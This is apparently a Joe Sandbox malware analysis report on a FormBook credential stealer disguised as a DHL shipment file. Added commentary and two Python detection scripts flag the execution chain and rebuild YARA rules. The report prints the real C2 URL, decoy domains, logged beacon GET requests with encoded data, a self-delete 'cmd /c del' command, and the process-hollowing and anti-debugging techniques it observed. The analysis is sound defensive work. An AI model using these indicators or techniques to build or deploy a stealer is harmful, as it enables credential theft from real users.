Windows Analysis Report
DHL SHIPMENT NOTIFICATION 1146789443.exe

Overview

General Information

Sample Name: DHL SHIPMENT NOTIFICATION 1146789443.exe
Analysis ID: 626119
MD5: 8fbdf9f70b21179d87b83fe47b2137dd
SHA1: 146eebe16adad9486cac66f4574810cec1f56cbb
SHA256: 972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHL SHIPMENT NOTIFICATION 1146789443.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" MD5: 8FBDF9F70B21179D87B83FE47B2137DD)
    • aeokw.exe (PID: 6272 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
      • aeokw.exe (PID: 6288 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
        • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 2360 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 6308 cmdline: /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
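The tree above is the whole FormBook execution chain in one picture. The NSIS dropper (the http://nsis.sf.net/NSIS_Error string and the nsk2671.tmp artifact cited later in this report identify an NSIS installer) writes aeokw.exe and the payload file fnnok to %TEMP%; aeokw.exe launches a second copy of itself with the same command line (the suspended-mode creation and process hollowing listed under Signatures); the hollowed copy injects into explorer.exe; explorer.exe starts C:\Windows\SysWOW64\svchost.exe as the next injection host; and that svchost.exe runs cmd.exe /c del to remove the dropper. Note that the report draws explorer.exe under aeokw.exe because the sandbox attributes an injected process to its injector; a native process-creation log shows explorer.exe's real parent and never shows that edge. The block below is an added example, not part of the report or of any Joe Sandbox tooling: it encodes three of those edges as checks over process-creation events. The events are constructed from the PIDs, paths and command lines in the tree; the image path of cmd.exe is assumed, since the report lists only its command line.

```python
"""Flag the execution chain from this report's process tree.

Added example, not part of the Joe Sandbox report or its tooling. EVENTS is a
constructed list of process-creation records shaped after the tree above (PIDs,
paths and command lines as listed there); it is not a real Sysmon/ETW export,
and the image path of cmd.exe is assumed because the report shows only its
command line.
"""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


TEMP = r"C:\Users\user\AppData\Local\Temp"
EVENTS = [
    ProcEvent(6224, 0, r"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe",
              r'"C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"'),
    ProcEvent(6272, 6224, TEMP + r"\aeokw.exe", TEMP + r"\aeokw.exe " + TEMP + r"\fnnok"),
    ProcEvent(6288, 6272, TEMP + r"\aeokw.exe", TEMP + r"\aeokw.exe " + TEMP + r"\fnnok"),
    # The sandbox draws explorer.exe under aeokw.exe to record the injection;
    # a native creation log would show explorer.exe's real parent instead.
    ProcEvent(3616, 6288, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(2360, 3616, r"C:\Windows\SysWOW64\svchost.exe", r"C:\Windows\SysWOW64\svchost.exe"),
    ProcEvent(6308, 2360, r"C:\Windows\SysWOW64\cmd.exe",          # image path assumed
              r'/c del "' + TEMP + r'\aeokw.exe"'),
    ProcEvent(1524, 6308, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.I)


def _base(path):
    return ntpath.basename(path).lower()


def _under_user_temp(path):
    return "\\appdata\\local\\temp\\" in path.lower()


def find_findings(events):
    """Return [(rule, pid)] for every event matching one of the three checks."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        # 1. A Temp-resident binary relaunching itself with an identical command
        #    line (aeokw.exe -> aeokw.exe): the prelude to hollowing the child.
        #    Installers self-spawn too, so this is a weak signal on its own.
        if (_base(e.image) == _base(parent.image) and _under_user_temp(e.image)
                and e.cmdline == parent.cmdline):
            findings.append(("self_spawn_from_temp", e.pid))
        # 2. svchost.exe whose parent is not services.exe. Here the injected
        #    explorer.exe starts the 32-bit svchost.exe as the next host.
        if _base(e.image) == "svchost.exe" and _base(parent.image) != "services.exe":
            findings.append(("svchost_unexpected_parent", e.pid))
        # 3. cmd.exe /c del <file under Temp> launched from a Windows binary:
        #    the dropper being deleted once the payload lives elsewhere.
        m = DEL_RE.search(e.cmdline)
        if (_base(e.image) == "cmd.exe" and m and _under_user_temp(m.group(1))
                and parent.image.lower().startswith("c:\\windows\\")):
            findings.append(("self_delete_via_cmd", e.pid))
    return findings


def lineage(events, pid):
    """Image basenames from the root of the tree down to pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < 64:
        chain.append(_base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for rule, pid in find_findings(EVENTS):
        print(f"{rule:28} pid={pid}  chain={' > '.join(lineage(EVENTS, pid))}")
```

Each check is weak alone (installers self-spawn, and a 32-bit svchost.exe under explorer.exe is odd but not unique to FormBook); what makes the chain convincing is that all three fire on one lineage, which is why `lineage` is printed next to every finding.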
Malware Configuration

{"C2 list": ["www.lgf7.com/amdf/"], "decoy": ["xadazheng.com", "bremorgan.com", "keilaniclothing.com", "du9a20ofolvhfr.xyz", "santamariacourt.com", "wcagls.com", "visionuptechnology.com", "sddysrq.com", "pencetslot.site", "wpcoisas.com", "caomei08.xyz", "infinitepotential.xyz", "anotherchanceranch.net", "ymterp.com", "zhuyunming.com", "elementarymodel.com", "edmondsonfinancial.com", "adsnethosting.com", "obohsan-souzokusindan.tech", "helicopterart.com", "shangnuanjia.com", "89660.world", "zkzxconsulting.com", "temp-bait.com", "8562.pet", "taojinwa.net", "chatterboxtwo.com", "pejoki.com", "effectual-science.com", "ma3721.com", "b498gszj.com", "sicuumon.com", "northwtb.com", "reconbattery.xyz", "sibirerzucht.com", "fusionpsychiatry.net", "biblicalguidance.net", "liquated99tic.com", "ruvinslimshop.com", "attjeans.com", "reservedadseyelevel.com", "theselungs.com", "safe-edd-centerhelp92.com", "provercoop.com", "216498.com", "bbqautopilot.com", "nurhurdacilik.com", "zo177.wales", "doublemsporthorses.com", "hl308.com", "movewhenyouwant.com", "smartinvestorsguide.com", "joga-wroclaw.com", "potionsparchment.com", "rtpholywin99.com", "sosocean.com", "vliralip.com", "alphaomegamerch.net", "pallettruckload.com", "spritzdao.xyz", "unbound-soul.com", "enssale.xyz", "capitalisllc.com", "ultrakill.xyz"]}

"C2 list" holds the real command-and-control URI; "decoy" holds the unrelated domains FormBook contacts with the same /amdf/ path so that the genuine C2 hides among them. The Networking section bears this out: in this run the sandbox saw explorer.exe resolve and fetch only www.rtpholywin99.com, www.keilaniclothing.com and www.ultrakill.xyz, all from the decoy list, and the replies were a Blogger "Page not found" (Server: GSE) and a Shopify storefront "Access denied" page (X-Sorting-Hat-* headers); the configured C2 www.lgf7.com was not contacted during the analysis. Block and hunt on www.lgf7.com/amdf/ and on the request shape, and treat the decoy names as third-party sites that happen to be in this build's list rather than as attacker infrastructure.
Yara Matches (Memory Dumps)

Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x78e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x88ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
    • 0x4809:$sqlite3step: 68 34 1C 7B E1
    • 0x491c:$sqlite3step: 68 34 1C 7B E1
    • 0x4838:$sqlite3text: 68 38 2A 90 C5
    • 0x495d:$sqlite3text: 68 38 2A 90 C5
    • 0x484b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x4973:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(28 further memory-dump matches are not reproduced here)
Yara Matches (Unpacked PEs)

Source: 2.0.aeokw.exe.400000.8.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 2.0.aeokw.exe.400000.8.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 2.0.aeokw.exe.400000.8.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
    • 0x17a09:$sqlite3step: 68 34 1C 7B E1
    • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a38:$sqlite3text: 68 38 2A 90 C5
    • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.2.aeokw.exe.12a0000.1.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.2.aeokw.exe.12a0000.1.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(22 further unpacked-PE matches are not reproduced here)
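The hex strings in these matches are worth reading, not just counting. 68 34 1C 7B E1 is push 0E17B1C34h: a 32-bit immediate pushed ahead of a call, which the rule author's names ($sqlite3step, $sqlite3text, $sqlite3blob) identify as the hashed names of the sqlite3 routines FormBook resolves at run time to read browser credential databases. 03 C8 0F 31 2B C1 89 45 FC is add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature. The block below is an added example, not the JPCERT/CC or yara-signator rule source (the report does not include either): it parses the hit lines exactly as they are printed above, rebuilds a buffer that places each pattern at its reported offset so the scan can be verified offline, renders an equivalent YARA rule, and extracts the immediate from a push imm32 pattern. The buffer is constructed and the rule name is mine.

```python
"""Rebuild a detection from the Yara string hits listed in this report.

Added example, not the report's own tooling nor the JPCERT/CC / yara-signator
rule source. Input lines are copied from the 2.0.aeokw.exe.400000.8.unpack
entries above; the buffer built from them is constructed for the offline check.
"""
import re

REPORT_LINES = """
0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x17a09:$sqlite3step: 68 34 1C 7B E1
0x17b1c:$sqlite3step: 68 34 1C 7B E1
0x17a38:$sqlite3text: 68 38 2A 90 C5
0x17b5d:$sqlite3text: 68 38 2A 90 C5
0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
0x17b73:$sqlite3blob: 68 53 D8 7F 8C
"""

# "<hex offset>:$<name>: <hex bytes>" is how Joe Sandbox prints a string hit.
HIT_RE = re.compile(r"^0x([0-9a-f]+):\$(\w+):\s*((?:[0-9a-f]{2}\s*)+)$", re.I)


def parse_hits(text):
    """Return [(offset, name, pattern_bytes)] for every hit line."""
    hits = []
    for raw in text.strip().splitlines():
        m = HIT_RE.match(raw.strip())
        if not m:
            raise ValueError(f"unrecognised hit line: {raw!r}")
        off, name, hexbytes = m.groups()
        hits.append((int(off, 16), name, bytes.fromhex(hexbytes.replace(" ", ""))))
    return hits


def unique_patterns(hits):
    """Map string name -> pattern, first-seen order (a name can hit more than once)."""
    patterns = {}
    for _, name, pat in hits:
        patterns.setdefault(name, pat)
    return patterns


def to_yara(rule_name, patterns, min_hits):
    """Render the patterns as a YARA rule that needs min_hits of the strings."""
    strings = "\n".join(f"        ${n} = {{ {p.hex(' ').upper()} }}" for n, p in patterns.items())
    return (f"rule {rule_name}\n{{\n    strings:\n{strings}\n"
            f"    condition:\n        {min_hits} of them\n}}\n")


def push_immediate(pat):
    """For a 'push imm32' pattern (opcode 0x68), return the 32-bit immediate."""
    if len(pat) != 5 or pat[0] != 0x68:
        raise ValueError("not a push imm32 pattern")
    return int.from_bytes(pat[1:], "little")


def rebuild_buffer(hits):
    """Constructed image: zeros with every pattern written at its reported offset."""
    size = max(off + len(pat) for off, _, pat in hits)
    buf = bytearray(size)
    for off, _, pat in hits:
        buf[off:off + len(pat)] = pat
    return bytes(buf)


def scan(buf, patterns):
    """Pure-Python string scan: every (offset, name) at which a pattern occurs."""
    found = []
    for name, pat in patterns.items():
        start = 0
        while (i := buf.find(pat, start)) != -1:
            found.append((i, name))
            start = i + 1
    return sorted(found)


if __name__ == "__main__":
    hits = parse_hits(REPORT_LINES)
    pats = unique_patterns(hits)
    print(to_yara("Formbook_report_strings", pats, 3))
    print(f"sqlite3step hash: 0x{push_immediate(pats['sqlite3step']):08X}")
    print(scan(rebuild_buffer(hits), pats))
```

Feed `scan` a real memory dump from the report (the .sdmp or .unpack files) and the offsets it returns should line up with the ones printed in the table; the push-immediate values are the constants to search for when the same hashing is met in a new FormBook build.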
          No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (the extracted configuration, C2 list and decoy domains, is reproduced in full after the process tree above)
Source: DHL SHIPMENT NOTIFICATION 1146789443.exe | Virustotal: Detection: 42%
Source: DHL SHIPMENT NOTIFICATION 1146789443.exe | ReversingLabs: Detection: 48%
Source: Yara match | File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx | Avira URL Cloud: Label: malware
Source: www.lgf7.com/amdf/ | Avira URL Cloud: Label: malware
Source: DHL SHIPMENT NOTIFICATION 1146789443.exe | Joe Sandbox ML: detected
Source: 2.0.aeokw.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.aeokw.exe.12a0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.aeokw.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.aeokw.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.aeokw.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL SHIPMENT NOTIFICATION 1146789443.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: DHL SHIPMENT NOTIFICATION 1146789443.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_004069A4 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_0040290B FindFirstFileW,
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi

Networking

Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe | Domain query: www.ultrakill.xyz
Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe | Network Connect: 142.250.185.115 80
Source: C:\Windows\explorer.exe | Domain query: www.rtpholywin99.com
Source: C:\Windows\explorer.exe | Domain query: www.keilaniclothing.com
Source: C:\Windows\explorer.exe | DNS query: www.ultrakill.xyz
Source: Malware configuration extractor | URLs: www.lgf7.com/amdf/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: global traffic | HTTP traffic detected:
    GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1
    Host: www.rtpholywin99.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1
    Host: www.keilaniclothing.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic | HTTP traffic detected:
    GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1
    Host: www.ultrakill.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 13 May 2022 14:10:37 GMT
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Connection: close
